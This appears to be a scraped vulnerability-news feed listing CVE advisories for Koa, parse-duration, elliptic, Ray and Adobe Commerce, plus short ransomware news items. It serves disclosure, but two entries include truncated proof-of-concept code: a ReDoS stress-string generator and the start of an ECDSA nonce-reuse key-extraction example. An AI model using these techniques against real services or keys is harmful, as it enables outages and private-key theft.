CVE-2025-25200 |
Description: Summary
Koa uses an evil regex to parse the X-Forwarded-Proto and X-Forwarded-Host HTTP headers. This can be exploited to carry out a Denial-of-Service attack.
PoC
Coming soon.
Impact
This is a Regex Denial-of-Service attack and causes memory exhaustion. The regex should be improved and empty values should not be allowed.
References
https://github.com/koajs/koa/security/advisories/GHSA-593f-38f6-jp5m
https://nvd.nist.gov/vuln/detail/CVE-2025-25200
https://github.com/koajs/koa/commit/5054af6e31ffd451a4151a1fe144cef6e5d0d83c
https://github.com/koajs/koa/commit/5f294bb1c7c8d9c61904378d250439a321bffd32
https://github.com/koajs/koa/commit/93fe903fc966635a991bcf890cfc3427d33a1a08
https://github.com/koajs/koa/releases/tag/2.15.4
https://github.com/advisories/GHSA-593f-38f6-jp5m
CVSS: CRITICAL (9.2) EPSS Score: 0.04%
February 12th, 2025 (5 months ago)
|
![]() |
Description: Summary
This report finds 2 availability issues due to the regex used in the parse-duration npm package:
An event loop delay due to the CPU-bound operation of resolving the provided string, from a 0.5ms and up to ~50ms per one operation, with a varying size from 0.01 MB and up to 4.3 MB respectively.
An out of memory that would crash a running Node.js application due to a string size of roughly 10 MB that utilizes unicode characters.
PoC
Refer to the following proof of concept code that provides a test case and makes use of the regular expression in the library as its test case to match against strings:
// Vulnerable regex to use from the library:
import parse from './index.js'
function generateStressTestString(length, decimalProbability) {
let result = "";
for (let i = 0; i < length; i++) {
if (Math.random() < decimalProbability) {
result += "....".repeat(99);
}
result += Math.floor(Math.random() * 10);
}
return result;
}
function getStringSizeInMB_UTF8(str) {
const sizeInBytes = Buffer.byteLength(str, 'utf8');
const sizeInMB = sizeInBytes / (1024 * 1024);
return sizeInMB;
}
// Generate test strings with varying length and decimal probability:
const longString1 = generateStressTestString(380, 0.05);
const longString2 = generateStressTestString(10000, 0.9);
const longString3 = generateStressTestString(500000, 1);
const longStringVar1 = '-1e' + '-----'.repeat(915000)
const longStringVar2 = "1" + "0".repeat(500) + "e1" + "α".repeat(52250...
February 12th, 2025 (5 months ago)
|
![]() |
[elliptic] Elliptic's private key extraction in ECDSA upon signing a malformed input (e.g. a string)
Description: Summary
Private key can be extracted from ECDSA signature upon signing a malformed input (e.g. a string or a number), which could e.g. come from JSON network input
Note that elliptic by design accepts hex strings as one of the possible input types
Details
In this code: https://github.com/indutny/elliptic/blob/3e46a48fdd2ef2f89593e5e058d85530578c9761/lib/elliptic/ec/index.js#L100-L107
msg is a BN instance after conversion, but nonce is an array, and different BN instances could generate equivalent arrays after conversion.
Meaning that a same nonce could be generated for different messages used in signing process, leading to k reuse, leading to private key extraction from a pair of signatures
Such a message can be constructed for any already known message/signature pair, meaning that the attack needs only a single malicious message being signed for a full key extraction
While signing unverified attacker-controlled messages would be problematic itself (and exploitation of this needs such a scenario), signing a single message still should not leak the private key
Also, message validation could have the same bug (out of scope for this report, but could be possible in some situations), which makes this attack more likely when used in a chain
PoC
k reuse example
import elliptic from 'elliptic'
const { ec: EC } = elliptic
const privateKey = crypto.getRandomValues(new Uint8Array(32))
const curve = 'ed25519' // or any other curve, e.g. secp256k1
const ec = new EC(curve)
const pret...
February 12th, 2025 (5 months ago)
|
CVE-2024-57000 |
Description: An issue in Anyscale Inc Ray between v.2.9.3 and v.2.40.0 allows a remote attacker to execute arbitrary code via a crafted script.
References
https://nvd.nist.gov/vuln/detail/CVE-2024-57000
https://github.com/honysyang/Ray.git
https://github.com/advisories/GHSA-xg2h-7cxj-3gvh
EPSS Score: 0.04%
February 12th, 2025 (5 months ago)
|
![]() |
Description: US, UK, and Australian law enforcement have targeted a company called Zservers (and two of its administrators) for providing bulletproof hosting services to the infamous ransomware gang.
February 12th, 2025 (5 months ago)
|
![]() |
February 12th, 2025 (5 months ago)
|
![]() |
Description: A relatively new ransomware operation named 'Sarcoma' has claimed responsibility for an attack against the Unimicron printed circuit boards (PCB) maker in Taiwan. [...]
February 12th, 2025 (5 months ago)
|
![]() |
Description: North Korean state actor 'Kimsuky' (aka 'Emerald Sleet' or 'Velvet Chollima') has been observed using a new tactic inspired from the now widespread ClickFix campaigns. [...]
February 12th, 2025 (5 months ago)
|
CVE-2025-24434 |
Description: Adobe Commerce versions 2.4.7-beta1, 2.4.7-p3, 2.4.6-p8, 2.4.5-p10, 2.4.4-p11 and earlier are affected by an Improper Authorization vulnerability that could result in Privilege escalation. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized access. Exploitation of this issue does not require user interaction. A successful attacker can abuse this to achieve session takeover, increasing the confidentiality and integrity impact as high.
References
https://nvd.nist.gov/vuln/detail/CVE-2025-24434
https://helpx.adobe.com/security/products/magento/apsb25-08.html
https://github.com/advisories/GHSA-fppq-f2m6-xv5c
CVSS: CRITICAL (9.1) EPSS Score: 0.05%
February 12th, 2025 (5 months ago)
|
CVE-2025-24434 |
Description: Adobe Commerce versions 2.4.7-beta1, 2.4.7-p3, 2.4.6-p8, 2.4.5-p10, 2.4.4-p11 and earlier are affected by an Improper Authorization vulnerability that could result in Privilege escalation. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized access. Exploitation of this issue does not require user interaction. A successful attacker can abuse this to achieve session takeover, increasing the confidentiality and integrity impact as high.
References
https://nvd.nist.gov/vuln/detail/CVE-2025-24434
https://helpx.adobe.com/security/products/magento/apsb25-08.html
https://github.com/advisories/GHSA-fppq-f2m6-xv5c
CVSS: CRITICAL (9.1) EPSS Score: 0.05%
February 12th, 2025 (5 months ago)
|